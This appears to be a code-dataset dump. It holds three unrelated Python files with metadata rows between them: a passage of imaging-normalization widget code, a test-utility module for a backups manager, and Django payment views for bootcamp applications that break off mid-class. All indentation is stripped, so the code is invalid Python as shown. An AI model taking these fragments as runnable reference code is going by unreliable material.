delta_time_after = last_ob_image.get('time_stamp', 0) - last_sample_image.get('time_stamp', 0)
_time_range_s_after = delta_time_after if delta_time_after > 0 else 0
_final_full_master_dict[_acquisition][_config]['time_range_s']['before'] = _time_range_s_before
_final_full_master_dict[_acquisition][_config]['time_range_s']['after'] = _time_range_s_after
def display_time_range_selection_widgets(self):
_final_full_master_dict = self.final_full_master_dict
_config_tab_dict = {} # will keep record of each config tab for each acquisition
_acquisition_tabs = widgets.Tab()
o_get = Get(parent=self)
for _acquisition_index, _acquisition in enumerate(_final_full_master_dict.keys()):
_dict_of_this_acquisition = _final_full_master_dict[_acquisition]
_config_tab = widgets.Tab()
_current_acquisition_tab_widgets_id = {'config_tab_id': _config_tab}
for _index, _config in enumerate(_dict_of_this_acquisition.keys()):
_dict_config = _dict_of_this_acquisition[_config]
_dict = o_get.full_layout_for_this_config(_dict_config)
_layout = _dict['verti_layout']
_config_widgets_id_dict = _dict['config_widgets_id_dict']
_config_tab.children += (_layout,)
_config_tab.set_title(_index, _config)
_current_acquisition_tab_widgets_id[_index] = _config_widgets_id_dict
_config_tab_dict[_acquisition_index] = _current_acquisition_tab_widgets_id
_acquisition_tabs.children += (_config_tab,) # add all the config tab to top acquisition tab
_acquisition_tabs.set_title(_acquisition_index, "Acquisition: {}s".format(_acquisition))
_config_tab
display(_acquisition_tabs)
self.acquisition_tab = _acquisition_tabs
self.config_tab_dict = _config_tab_dict
def calculate_max_time_before_and_after_exp_for_this_config(self, dict_config):
max_time_before = 0
first_sample_image_time_stamp = dict_config['first_images']['sample']['time_stamp']
first_ob_image_time_stamp = dict_config['first_images']['ob'].get('time_stamp', 0)
if first_ob_image_time_stamp > first_sample_image_time_stamp:
max_time_before = 0
else:
max_time_before = (first_sample_image_time_stamp - first_ob_image_time_stamp)
max_time_after = 0
last_sample_image_time_stamp = dict_config['last_images']['sample']['time_stamp']
last_ob_image_time_stamp = dict_config['last_images']['ob'].get('time_stamp', 0)
if last_ob_image_time_stamp < last_sample_image_time_stamp:
max_time_after = 0
else:
max_time_after = last_ob_image_time_stamp - last_sample_image_time_stamp
return [max_time_before, max_time_after]
def populate_metadata_table(self, current_config):
metadata_config = current_config['metadata_infos']
table_label = widgets.Label("List of Metadata used to match data set",
layout=widgets.Layout(width='30%'))
table_value = "<table style='width:50%;background-color:#eee'>"
for _key, _value in metadata_config.items():
table_value += "<tr><th>{}</th><th>{}</th></tr>".format(_value['name'], _value['value'])
table_value += "</table>"
table = widgets.HTML(value=table_value)
return [table_label, table]
def update_use_this_config_widget(self, state):
pass
# new_state = state['new']
# [active_acquisition, active_config] = self.get_active_tabs()
# self.config_tab_dict[active_acquisition][active_config]['normalize_this_config'] = new_state
def update_config_widgets(self, state):
if state['new'] is False:
# use all files
message = None
visibility = 'hidden'
else:
# user defines ranges
message = True
visibility = 'visible'
o_get = Get(parent=self)
[time_before_selected_ui, time_after_selected_ui] = o_get.time_before_and_after_ui_of_this_config()
experiment_label_ui = o_get.experiment_label_ui_of_this_config()
experiment_label_ui.layout.visibility = visibility
if visibility == 'hidden':
time_before_selected_ui.layout.visibility = 'hidden'
time_after_selected_ui.layout.visibility = 'hidden'
else:
self.show_or_not_before_and_after_sliders()
self.update_time_range_event(message)
def show_or_not_before_and_after_sliders(self):
o_get = Get(parent=self)
current_config = o_get.current_config_dict()
[max_time_elapse_before_experiment, max_time_elapse_after_experiment] = \
self.calculate_max_time_before_and_after_exp_for_this_config(current_config)
slider_before_visibility = 'visible' if max_time_elapse_before_experiment > 0 else 'hidden'
slider_after_visibility = 'visible' if max_time_elapse_after_experiment > 0 else 'hidden'
[time_before_selected_ui, time_after_selected_ui] = o_get.time_before_and_after_ui_of_this_config()
time_before_selected_ui.layout.visibility = slider_before_visibility
time_after_selected_ui.layout.visibility = slider_after_visibility
def is_custom_time_range_checked_for_this_config(self):
o_get = Get(parent=self)
current_config = o_get.current_config_of_widgets_id()
return current_config['use_custom_time_range_checkbox'].value
def update_time_range_event(self, value):
# reach when user interact with the sliders in the config tab
self.update_time_range_message(value)
self.update_list_of_files_in_widgets_using_new_time_range()
def update_list_of_files_in_widgets_using_new_time_range(self):
o_get = Get(parent=self)
# retrieve acquisition and config values
acquisition_key = o_get.active_tab_acquisition_key() # ex: '55.0'
config_key = o_get.active_tab_config_key() # ex: 'config0'
# retrieve list of ob and df for this config for this acquisition
final_full_master_dict = self.final_full_master_dict
dict_for_this_config = final_full_master_dict[float(acquisition_key)][config_key]
list_ob = dict_for_this_config['list_ob']
# no need to do anything more if user wants to use all the files
if not self.is_custom_time_range_checked_for_this_config():
list_ob_to_keep = [_file['filename'] for _file in list_ob]
else:
# retrieve first and last sample file for this config and for this acquisition
first_sample_image_time_stamp = dict_for_this_config['first_images']['sample']['time_stamp']
last_sample_images_time_stamp = dict_for_this_config['last_images']['sample']['time_stamp']
# retrieve time before and after selected
[time_before_selected, time_after_selected] = o_get.time_before_and_after_of_this_config()
# calculate list of ob that are within that time range
list_ob_to_keep = []
for _ob_file in list_ob:
_ob_time_stamp = _ob_file['time_stamp']
if (_ob_time_stamp < first_sample_image_time_stamp) and \
((first_sample_image_time_stamp - _ob_time_stamp) <= np.abs(time_before_selected)):
list_ob_to_keep.append(_ob_file['filename'])
elif (_ob_time_stamp > last_sample_images_time_stamp) and \
((_ob_time_stamp - last_sample_images_time_stamp) <= np.abs(time_after_selected)):
list_ob_to_keep.append(_ob_file['filename'])
self.update_list_of_ob_for_current_config_tab(list_ob=list_ob_to_keep)
def update_list_of_ob_for_current_config_tab(self, list_ob=[]):
o_get = Get(parent=self)
[active_acquisition, active_config] = o_get.active_tabs()
# short_version_list_ob = NormalizationWithSimplifySelection.keep_basename_only(list_files=list_ob)
self.config_tab_dict[active_acquisition][active_config]['list_of_ob'].options = list_ob
# select everything by default
self.config_tab_dict[active_acquisition][active_config]['list_of_ob'].value = list_ob
def update_time_range_message(self, value):
o_get = Get(parent=self)
if value is None:
_message = "Use <b><font color='red'>All </b> " \
"<font color='black'>OBs and DFs " \
"matching the samples images</font>"
else:
[time_before_selected, time_after_selected] = o_get.time_before_and_after_of_this_config()
time_before_selected = np.abs(time_before_selected)
def _format_time(_time_s):
if _time_s < 60:
return "{:.2f}s".format(_time_s)
elif _time_s < 3600:
_time_mn = int(_time_s / 60.)
_time_s = int(_time_s % 60)
return "{:d}mn {:d}s".format(_time_mn, _time_s)
else:
_time_hr = int(_time_s / 3600.)
_time_s_left = _time_s - _time_hr * 3600
_time_mn = int(_time_s_left / 60.)
_time_s = int(_time_s_left % 60)
return "{:d}hr {:d}mn {:d}s".format(_time_hr, _time_mn, _time_s)
str_time_before = _format_time(time_before_selected)
str_time_after = _format_time(time_after_selected)
logging.info(f"str_time_before: {time_before_selected} -> {str_time_before}")
_message = "Use OB taken up to <b><font color='red'>" + str_time_before + "</b> " \
"<font color='black'>before and up to </font>" \
"<b><font color='red'>" + str_time_after + "</b> " \
"<font color='black'>after experiment!</font>"
time_before_and_after_message_ui = o_get.time_before_and_after_message_ui_of_this_config()
time_before_and_after_message_ui.value = _message
def checking_normalization_workflow(self):
self.create_final_json()
self.normalization_recap()
def create_final_json(self):
_final_full_master_dict = self.final_full_master_dict
_config_tab_dict = self.config_tab_dict
_final_json_dict = {}
for _acquisition_index, _acquisition in enumerate(_final_full_master_dict.keys()):
_final_json_for_this_acquisition = {}
_config_of_this_acquisition = _config_tab_dict[_acquisition_index]
_dict_of_this_acquisition = _final_full_master_dict[_acquisition]
for _config_index, _config in enumerate(_dict_of_this_acquisition.keys()):
this_config_tab_dict = _config_tab_dict[_acquisition_index][_config_index]
normalize_flag = this_config_tab_dict['use_this_config']
list_sample = this_config_tab_dict['list_of_sample_runs'].options
list_ob = this_config_tab_dict['list_of_ob'].value
list_df = this_config_tab_dict['list_of_df'].value
_final_json_for_this_acquisition[_config] = {'list_sample' : list_sample,
'list_df' : list_df,
'list_ob' : list_ob,
'normalize_this_config': normalize_flag}
_final_json_dict[_acquisition] = _final_json_for_this_acquisition
self.final_json_dict = _final_json_dict
def normalization_recap(self):
"""this will show all the config that will be run and if they have the minimum requirements or not,
which mean, at least 1 OB"""
final_json = self.final_json_dict
self.number_of_normalization = 0
table = "<table style='width:50%;border:1px solid black'>"
table += "<tr style='background-color:#eee'><th>Acquisition (s)</th><th>Config. name</th>" \
"<th>Nbr sample</th><th>Nbr OB</th><th>Nbr DF</th><th>Status</th></tr>"
for _name_acquisition in final_json.keys():
_current_acquisition_dict = final_json[_name_acquisition]
for _name_config in _current_acquisition_dict.keys():
_current_config_dict = _current_acquisition_dict[_name_config]
normalize_this_config = _current_config_dict['normalize_this_config']
nbr_ob = len(_current_config_dict['list_ob'])
nbr_df = len(_current_config_dict['list_df'])
nbr_sample = len(_current_config_dict['list_sample'])
self.number_of_normalization += 1 if nbr_ob > 0 else 0
table += utilities.populate_normalization_recap_row(
acquisition=_name_acquisition,
config=_name_config,
nbr_sample=nbr_sample,
nbr_ob=nbr_ob,
nbr_df=nbr_df,
normalize_this_config=normalize_this_config)
table += "</table>"
table_ui = widgets.HTML(table)
display(table_ui)
def select_output_folder(self):
self.output_folder_ui = myfileselector.FileSelectorPanelWithJumpFolders(
instruction='select where to create the ' + \
'normalized folders',
start_dir=self.working_dir,
ipts_folder=self.working_dir,
next=self.normalization,
type='directory',
newdir_toolbar_button=True)
def normalization(self, output_folder):
display(HTML('<span style="font-size: 20px; color:blue">Make sure you do not close the notebook until'
'the busy signal (dark circle top right) is is gone!</span>'))
self.output_folder_ui.shortcut_buttons.close() # hack to hide the buttons
final_json = self.final_json_dict
number_of_normalization = self.number_of_normalization
horizontal_layout = widgets.HBox([widgets.Label("Normalization progress",
layout=widgets.Layout(width='20%')),
widgets.IntProgress(max=number_of_normalization + 1,
value=0,
layout=widgets.Layout(width='50%'))])
normalization_progress = horizontal_layout.children[1]
display(horizontal_layout)
list_full_output_normalization_folder_name = []
for _name_acquisition in final_json.keys():
_current_acquisition_dict = final_json[_name_acquisition]
for _name_config in _current_acquisition_dict.keys():
_current_config = _current_acquisition_dict[_name_config]
list_ob = _current_config['list_ob']
if len(list_ob) == 0:
normalization_progress.value += 1
continue
if not _current_config['normalize_this_config'].value:
normalization_progress.value += 1
continue
list_sample = _current_config['list_sample']
full_output_normalization_folder_name = \
utilities.make_full_output_normalization_folder_name(
output_folder=output_folder,
first_sample_file_name=list_sample[0],
name_acquisition=_name_acquisition,
name_config=_name_config)
list_full_output_normalization_folder_name.append(full_output_normalization_folder_name)
list_df = _current_config['list_df']
o_load = Normalization()
o_load.load(file=list(list_sample), notebook=True)
o_load.load(file=list(list_ob), data_type='ob')
if len(list_df) > 0:
o_load.load(file=list(list_df), data_type='df')
o_load.normalization()
o_load.export(folder=full_output_normalization_folder_name, file_type='tif')
del o_load
normalization_progress.value += 1
horizontal_layout.close()
display(HTML('<span style="font-size: 20px; color:blue">Following folders have been created:</span>'))
for _folder in list_full_output_normalization_folder_name:
_folder = _folder if _folder else "None"
display(HTML('<span style="font-size: 15px; color:blue"> -> ' + _folder + '</span>'))
| 51.304465
| 175
| 0.579786
| 4,172
| 37,914
| 4.775168
| 0.090364
| 0.026102
| 0.0384
| 0.04864
| 0.544925
| 0.450507
| 0.346351
| 0.295502
| 0.25635
| 0.223522
| 0
| 0.006122
| 0.340798
| 37,914
| 738
| 176
| 51.373984
| 0.790981
| 0.093396
| 0
| 0.274102
| 0
| 0.009452
| 0.091439
| 0.01683
| 0
| 0
| 0
| 0
| 0
| 1
| 0.066163
| false
| 0.00189
| 0.024575
| 0
| 0.109641
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
759e0a9f6bfd13dc1e30f52a13990d9895e8e99e
| 12,719
|
py
|
Python
|
backups_manager_lib_test_util.py
|
cantstopthesignal/backups_lib
|
dec602fc90d285b8581af35e514eb90309b6da89
|
[
"Apache-2.0"
] | null | null | null |
backups_manager_lib_test_util.py
|
cantstopthesignal/backups_lib
|
dec602fc90d285b8581af35e514eb90309b6da89
|
[
"Apache-2.0"
] | null | null | null |
backups_manager_lib_test_util.py
|
cantstopthesignal/backups_lib
|
dec602fc90d285b8581af35e514eb90309b6da89
|
[
"Apache-2.0"
] | null | null | null |
import contextlib
import io
import os
import re
import subprocess
from . import backups_manager_lib
from . import backups_main
from . import lib
from .test_util import AssertEquals
from .test_util import AssertLinesEqual
from .test_util import CreateDir
from .test_util import CreateFile
from .test_util import DoBackupsMain
def CreateConfig(parent_dir, backups_filename_prefix='backups', filter_merge_path=None):
config_path = os.path.join(parent_dir, '%s.config' % backups_filename_prefix)
config = backups_manager_lib.BackupsConfig(config_path)
config.image_path = os.path.join(parent_dir, '%s.sparsebundle' % backups_filename_prefix)
config.mount_path = os.path.join(parent_dir, '%s_mount' % backups_filename_prefix)
config.src_path = CreateDir(parent_dir, '%s_src' % backups_filename_prefix)
config.checkpoints_dir = CreateDir(parent_dir, '%s_checkpoints' % backups_filename_prefix)
config.filter_merge_path = filter_merge_path
config.Write()
return config
def CreateBackupsBundle(config, create_example_content=True):
lib.GetDiskImageHelper().CreateImage(
config.image_path, size='10G', filesystem='APFS', image_type='SPARSEBUNDLE', volume_name='Backups')
with lib.ImageAttacher(config.image_path, config.mount_path, readonly=False,
browseable=False) as attacher:
backups_dir = CreateDir(attacher.GetMountPoint(), backups_manager_lib.BACKUPS_SUBDIR)
backup1_dir = CreateDir(backups_dir, '2020-01-01-120000')
CreateDir(backup1_dir, '.metadata')
disk_dir = CreateDir(backup1_dir, 'Root')
if create_example_content:
CreateFile(disk_dir, 'f1')
CreateFile(disk_dir, 'fX')
CreateFile(disk_dir, 'fT')
def CreateLatestManifestCheckpoint(config):
backups_manager = backups_manager_lib.BackupsManager.Open(
config, readonly=False, browseable=False)
try:
last_backup = backups_manager.GetLastDone()
src_root = last_backup.GetContentRootPath()
output_lines = DoBackupsMain(['create-checkpoint',
'--src-root', src_root,
'--checksum-all',
'--manifest-only',
'--no-encrypt',
'--checkpoint-name', last_backup.GetName(),
'--checkpoints-dir', config.checkpoints_dir],
expected_output=None)
m = re.match('^Created checkpoint at (.+)$', output_lines[-1])
assert m
checkpoint_path = m.group(1)
AssertLinesEqual(output_lines[:-1],
['>d+++++++ .',
'>f+++++++ f1',
'>f+++++++ fT',
'>f+++++++ fX',
'Transferring 4 paths (0b)'])
manifest = lib.ReadManifestFromImageOrPath(checkpoint_path)
manifest.SetPath(last_backup.GetManifestPath())
manifest.Write()
return checkpoint_path
finally:
backups_manager.Close()
def VerifyBackupManifest(backup, path=None):
if path is None:
manifest = lib.Manifest.Load(backup.GetManifestPath())
else:
manifest = lib.ReadManifestFromImageOrPath(path)
output = io.StringIO()
verifier = lib.ManifestVerifier(manifest, backup.GetContentRootPath(), output,
checksum_path_matcher=lib.PathMatcherAll())
success = verifier.Verify()
output_lines = [ line for line in output.getvalue().strip().split('\n') if line ]
output.close()
AssertLinesEqual(output_lines, [])
if not success:
raise Exception('Verification failed')
@contextlib.contextmanager
def SetLogThrottlerLogAlways(log_throttler):
old_value = log_throttler.GetLogAlways()
log_throttler.SetLogAlways(True)
try:
yield
finally:
log_throttler.SetLogAlways(old_value)
def DoCreateCheckpoint(src_root, checkpoints_dir, checkpoint_name, expected_output=[],
last_checkpoint_path=None, filter_merge_path=None):
args = ['create-checkpoint',
'--no-encrypt',
'--checksum-all',
'--src-root', src_root,
'--checkpoints-dir', checkpoints_dir,
'--checkpoint-name', checkpoint_name]
if last_checkpoint_path is not None:
args.extend(['--last-checkpoint', last_checkpoint_path])
if filter_merge_path is not None:
args.extend(['--filter-merge-path', filter_merge_path])
output = io.StringIO()
AssertEquals(backups_main.Main(args, output), True)
output_lines = []
checkpoint_path = None
for line in output.getvalue().strip().split('\n'):
m = re.match('^Created checkpoint at (.+)$', line)
if m:
checkpoint_path = m.group(1)
continue
output_lines.append(line)
output.close()
AssertLinesEqual(output_lines, expected_output)
return checkpoint_path
def DoCreateBackup(config, backup_name=None, dry_run=False, expected_output=[]):
cmd_args = ['create-backup',
'--no-encrypt',
'--backups-config', config.path]
if backup_name is not None:
cmd_args.extend(['--backup-name', backup_name])
lines = DoBackupsMain(cmd_args, dry_run=dry_run, expected_output=None)
checkpoint_path = None
output_lines = []
for line in lines:
m = re.match('^Created checkpoint at (.+)$', line)
if m:
checkpoint_path = m.group(1)
continue
output_lines.append(line)
AssertLinesEqual(output_lines, expected_output)
return checkpoint_path
def DoApplyToBackups(config, dry_run=False, deduplicate_min_file_size=1024,
checksum_all=True, checksum_hardlinks=True, expected_success=True,
expected_output=[]):
cmd_args = ['apply-to-backups',
'--backups-config', config.path,
'--deduplicate-min-file-size', str(deduplicate_min_file_size)]
if not checksum_all:
cmd_args.append('--no-checksum-all')
if not checksum_hardlinks:
cmd_args.append('--no-checksum-hardlinks')
DoBackupsMain(cmd_args, dry_run=dry_run, expected_success=expected_success,
expected_output=expected_output)
def DoListBackups(config, dry_run=False, expected_backups=[]):
cmd_args = ['list-backups',
'--backups-config', config.path]
DoBackupsMain(cmd_args, dry_run=dry_run, expected_output=expected_backups)
def DoVerifyBackups(config, dry_run=False, min_backup=None, max_backup=None,
full=True, continue_on_error=False, checksum_all=True,
expected_success=True, expected_output=[]):
cmd_args = ['verify-backups',
'--backups-config', config.path]
if min_backup is not None:
cmd_args.extend(['--min-backup', min_backup])
if max_backup is not None:
cmd_args.extend(['--max-backup', max_backup])
if not full:
cmd_args.append('--no-full')
if continue_on_error:
cmd_args.append('--continue-on-error')
if not checksum_all:
cmd_args.append('--no-checksum-all')
DoBackupsMain(cmd_args, dry_run=dry_run, expected_success=expected_success,
expected_output=expected_output)
def DoAddMissingManifestsToBackups(config, expected_output=[]):
cmd_args = ['add-missing-manifests-to-backups',
'--backups-config', config.path]
DoBackupsMain(cmd_args, expected_output=expected_output)
def DoDeduplicateBackups(
config, min_backup=None, max_backup=None, match_older_mtimes=False, dry_run=False, verbose=False,
expected_output=[]):
cmd_args = ['deduplicate-backups',
'--min-file-size', '1024',
'--backups-config', config.path]
if min_backup is not None:
cmd_args.extend(['--min-backup', min_backup])
if max_backup is not None:
cmd_args.extend(['--max-backup', max_backup])
if match_older_mtimes:
cmd_args.append('--match-older-mtimes')
DoBackupsMain(cmd_args, dry_run=dry_run, verbose=verbose, expected_output=expected_output)
def DoCloneBackup(config, backup_name, dry_run=False, expected_success=True, expected_output=[]):
cmd_args = ['clone-backup',
'--backups-config', config.path,
'--backup-name', backup_name]
DoBackupsMain(cmd_args, dry_run=dry_run, expected_success=expected_success,
expected_output=expected_output)
def DoDeleteBackups(config, backup_names, dry_run=False, expected_success=True, expected_output=[]):
cmd_args = ['delete-backups',
'--backups-config', config.path]
for backup_name in backup_names:
cmd_args.extend(['--backup-name', backup_name])
DoBackupsMain(cmd_args, dry_run=dry_run, expected_success=expected_success,
expected_output=expected_output)
def DoDeleteBackupsInteractive(config, backup_names=[], min_backup=None, max_backup=None,
ignore_matching_renames=False, include_latest_backup=False,
dry_run=False, verbose=False,
expected_success=True, expected_output=[]):
cmd_args = ['delete-backups-interactive',
'--backups-config', config.path]
for backup_name in backup_names:
cmd_args.extend(['--backup-name', backup_name])
if min_backup is not None:
cmd_args.extend(['--min-backup', min_backup])
if max_backup is not None:
cmd_args.extend(['--max-backup', max_backup])
if ignore_matching_renames:
cmd_args.append('--ignore-matching-renames')
if include_latest_backup:
cmd_args.append('--include-latest-backup')
DoBackupsMain(cmd_args, dry_run=dry_run, verbose=verbose, expected_success=expected_success,
expected_output=expected_output)
def DoDumpUniqueFilesInBackups(config, backup_names=[], min_backup=None, max_backup=None,
ignore_matching_renames=False, match_previous_only=False,
match_next_only=False, dry_run=False, verbose=False,
expected_success=True, expected_output=[]):
cmd_args = ['dump-unique-files-in-backups',
'--backups-config', config.path]
for backup_name in backup_names:
cmd_args.extend(['--backup-name', backup_name])
if min_backup is not None:
cmd_args.extend(['--min-backup', min_backup])
if max_backup is not None:
cmd_args.extend(['--max-backup', max_backup])
if ignore_matching_renames:
cmd_args.append('--ignore-matching-renames')
if match_previous_only:
cmd_args.append('--match-previous-only')
if match_next_only:
cmd_args.append('--match-next-only')
DoBackupsMain(cmd_args, dry_run=dry_run, verbose=verbose, expected_success=expected_success,
expected_output=expected_output)
def DoExtractFromBackups(config, dry_run=False, min_backup=None, max_backup=None,
output_image_path=None, paths=[], expected_success=True,
expected_output=[]):
cmd_args = ['extract-from-backups',
'--backups-config', config.path,
'--no-encrypt',
'--deduplicate-min-file-size', '1024']
if output_image_path is not None:
cmd_args.extend(['--output-image-path', output_image_path])
for path in paths:
cmd_args.extend(['--path', path])
if min_backup is not None:
cmd_args.extend(['--min-backup', min_backup])
if max_backup is not None:
cmd_args.extend(['--max-backup', max_backup])
DoBackupsMain(cmd_args, dry_run=dry_run, expected_success=expected_success,
expected_output=expected_output)
def DoMergeIntoBackups(config, dry_run=False, min_backup=None, max_backup=None,
from_image_path=None, expected_success=True,
expected_output=[]):
cmd_args = ['merge-into-backups',
'--backups-config', config.path,
'--deduplicate-min-file-size', '1024']
if from_image_path is not None:
cmd_args.extend(['--from-image-path', from_image_path])
if min_backup is not None:
cmd_args.extend(['--min-backup', min_backup])
if max_backup is not None:
cmd_args.extend(['--max-backup', max_backup])
DoBackupsMain(cmd_args, dry_run=dry_run, expected_success=expected_success,
expected_output=expected_output)
def DoDeleteInBackups(config, dry_run=False, min_backup=None, max_backup=None,
paths=[], expected_success=True, expected_output=[]):
cmd_args = ['delete-in-backups',
'--backups-config', config.path]
if min_backup is not None:
cmd_args.extend(['--min-backup', min_backup])
if max_backup is not None:
cmd_args.extend(['--max-backup', max_backup])
for path in paths:
cmd_args.extend(['--path', path])
DoBackupsMain(cmd_args, dry_run=dry_run, expected_success=expected_success,
expected_output=expected_output)
| 40.123028
| 103
| 0.676232
| 1,524
| 12,719
| 5.382546
| 0.129921
| 0.050347
| 0.034865
| 0.024869
| 0.541631
| 0.512252
| 0.477508
| 0.455443
| 0.41814
| 0.358649
| 0
| 0.004347
| 0.204104
| 12,719
| 316
| 104
| 40.25
| 0.805986
| 0
| 0
| 0.450549
| 0
| 0
| 0.126032
| 0.022329
| 0
| 0
| 0
| 0
| 0.029304
| 1
| 0.069597
| false
| 0
| 0.047619
| 0
| 0.131868
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
759fec04ca6bf4fd01f099c1761a43c8c03c98c7
| 9,116
|
py
|
Python
|
ecommerce/views.py
|
umarmughal824/bootcamp-ecommerce
|
681bcc788a66867b8f240790c0ed33680b73932b
|
[
"BSD-3-Clause"
] | 2
|
2018-06-20T19:37:03.000Z
|
2021-01-06T09:51:40.000Z
|
ecommerce/views.py
|
mitodl/bootcamp-ecommerce
|
ba7d6aefe56c6481ae2a5afc84cdd644538b6d50
|
[
"BSD-3-Clause"
] | 1,226
|
2017-02-23T14:52:28.000Z
|
2022-03-29T13:19:54.000Z
|
ecommerce/views.py
|
umarmughal824/bootcamp-ecommerce
|
681bcc788a66867b8f240790c0ed33680b73932b
|
[
"BSD-3-Clause"
] | 3
|
2017-03-20T03:51:27.000Z
|
2021-03-19T15:54:31.000Z
|
"""Views for ecommerce"""
from decimal import Decimal
import logging
from django.conf import settings
from django.contrib.auth import get_user_model
from django.http.response import Http404
from django.shortcuts import get_object_or_404
from django.urls import reverse
from ipware import get_client_ip
from rest_framework import status as statuses
from rest_framework.authentication import SessionAuthentication
from rest_framework.generics import CreateAPIView, GenericAPIView, RetrieveAPIView
from rest_framework.permissions import IsAuthenticated
from rest_framework.renderers import TemplateHTMLRenderer
from rest_framework.response import Response
from rest_framework.validators import ValidationError
from rest_framework.views import APIView
from applications.constants import AppStates
from applications.models import BootcampApplication
from backends.edxorg import EdxOrgOAuth2
from ecommerce.api import (
complete_successful_order,
create_unfulfilled_order,
generate_cybersource_sa_payload,
get_new_order_by_reference_number,
handle_rejected_order,
serialize_user_bootcamp_run,
serialize_user_bootcamp_runs,
)
from ecommerce.constants import CYBERSOURCE_DECISION_ACCEPT, CYBERSOURCE_DECISION_CANCEL
from ecommerce.exceptions import EcommerceException
from ecommerce.models import Line, Order, Receipt
from ecommerce.permissions import IsSignedByCyberSource
from ecommerce.serializers import (
CheckoutDataSerializer,
PaymentSerializer,
OrderSerializer,
)
from hubspot.task_helpers import sync_hubspot_application_from_order
from klasses.models import BootcampRun
from klasses.permissions import CanReadIfSelf
from main.permissions import UserIsOwnerOrAdminPermission
from main.serializers import serialize_maybe_user
log = logging.getLogger(__name__)
User = get_user_model()
class PaymentView(CreateAPIView):
"""
View for payment API. This creates an Order in our system and provides a dictionary to send to Cybersource.
"""
authentication_classes = (SessionAuthentication,)
permission_classes = (IsAuthenticated,)
serializer_class = PaymentSerializer
def post(self, request, *args, **kwargs):
"""
Create an unfulfilled order and return a response for it.
"""
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
payment_amount = Decimal(serializer.data["payment_amount"])
application_id = serializer.data["application_id"]
application = get_object_or_404(
BootcampApplication, id=application_id, user=self.request.user
)
if application.state != AppStates.AWAITING_PAYMENT.value:
log.error(
"User attempted to pay for application %d with invalid state %s",
application.id,
application.state,
)
raise ValidationError("Invalid application state")
order = create_unfulfilled_order(
application=application, payment_amount=payment_amount
)
# Sync order data with hubspot
sync_hubspot_application_from_order(order)
redirect_url = self.request.build_absolute_uri(reverse("applications"))
user_ip, _ = get_client_ip(request)
return Response(
{
"payload": generate_cybersource_sa_payload(
order, redirect_url, ip_address=user_ip
),
"url": settings.CYBERSOURCE_SECURE_ACCEPTANCE_URL,
}
)
class OrderFulfillmentView(APIView):
"""
View for order fulfillment API. This API is special in that only CyberSource should talk to it.
Instead of authenticating with OAuth or via session this looks at the signature of the message
to verify authenticity.
"""
authentication_classes = ()
permission_classes = (IsSignedByCyberSource,)
def post(self, request, *args, **kwargs): # pylint: disable=unused-argument
"""
Confirmation from CyberSource which fulfills an existing Order.
"""
# First, save this information in a receipt
receipt = Receipt.objects.create(data=request.data)
# Link the order with the receipt if we can parse it
reference_number = request.data["req_reference_number"]
order = get_new_order_by_reference_number(reference_number)
receipt.order = order
receipt.save()
decision = request.data["decision"]
if order.status == Order.FAILED and decision == CYBERSOURCE_DECISION_CANCEL:
# This is a duplicate message, ignore since it's already handled
return Response(status=statuses.HTTP_200_OK)
elif order.status != Order.CREATED:
raise EcommerceException(
"Order {} is expected to have status 'created'".format(order.id)
)
if decision != CYBERSOURCE_DECISION_ACCEPT:
handle_rejected_order(order=order, decision=decision)
else:
# import pdb; pdb.set_trace()
complete_successful_order(order)
# Sync order data with hubspot
sync_hubspot_application_from_order(order)
# The response does not matter to CyberSource
return Response(status=statuses.HTTP_200_OK)
class UserBootcampRunDetail(GenericAPIView):
"""
Class based view for user bootcamp run view.
"""
authentication_classes = (SessionAuthentication,)
permission_classes = (IsAuthenticated, CanReadIfSelf)
lookup_field = "run_key"
lookup_url_kwarg = "run_key"
queryset = BootcampRun.objects.all()
def get(
self, request, username, *args, **kwargs
): # pylint: disable=unused-argument
"""
Returns a serialized bootcamp run and payment for a user
"""
user = get_object_or_404(
User, social_auth__uid=username, social_auth__provider=EdxOrgOAuth2.name
)
bootcamp_run = self.get_object()
return Response(
serialize_user_bootcamp_run(user=user, bootcamp_run=bootcamp_run)
)
class UserBootcampRunStatement(RetrieveAPIView):
"""
View class for a user's bootcamp run payment statement
"""
authentication_classes = (SessionAuthentication,)
permission_classes = (IsAuthenticated,)
lookup_field = "run_key"
lookup_url_kwarg = "run_key"
queryset = BootcampRun.objects.all()
renderer_classes = (TemplateHTMLRenderer,)
def get(self, request, *args, **kwargs):
"""
Fetches a user's bootcamp run payment information and renders their statement
(or raises a 404 if they have no payments for the specified bootcamp run)
"""
bootcamp_run = self.get_object()
if Line.for_user_bootcamp_run(request.user, bootcamp_run).count() == 0:
raise Http404
return Response(
{
"user": serialize_maybe_user(request.user),
"bootcamp_run": serialize_user_bootcamp_run(
user=request.user, bootcamp_run=bootcamp_run
),
},
template_name="bootcamp/statement.html",
)
class UserBootcampRunList(APIView):
"""
Class based view for user bootcamp run list view.
"""
authentication_classes = (SessionAuthentication,)
permission_classes = (IsAuthenticated, CanReadIfSelf)
def get(
self, request, username, *args, **kwargs
): # pylint: disable=unused-argument
"""
Returns serialized bootcamp runs and payments for all runs that a user can pay for.
"""
user = get_object_or_404(
User, social_auth__uid=username, social_auth__provider=EdxOrgOAuth2.name
)
return Response(serialize_user_bootcamp_runs(user=user))
class CheckoutDataView(RetrieveAPIView):
"""
List application ecommerce data for a user, for payable applications
"""
authentication_classes = (SessionAuthentication,)
permission_classes = (IsAuthenticated,)
serializer_class = CheckoutDataSerializer
def get_queryset(self):
"""Filter on valid applications for the user"""
return (
BootcampApplication.objects.filter(
user=self.request.user, state=AppStates.AWAITING_PAYMENT.value
)
.select_related("bootcamp_run")
.prefetch_related(
"bootcamp_run__personal_prices",
"bootcamp_run__installment_set",
"orders",
"orders__line_set",
)
.order_by("id")
)
def get_object(self):
"""Get the application given the query parameter"""
application_id = self.request.query_params.get("application")
return get_object_or_404(self.get_queryset(), id=application_id)
class OrderView(RetrieveAPIView):
"""API view for Orders"""
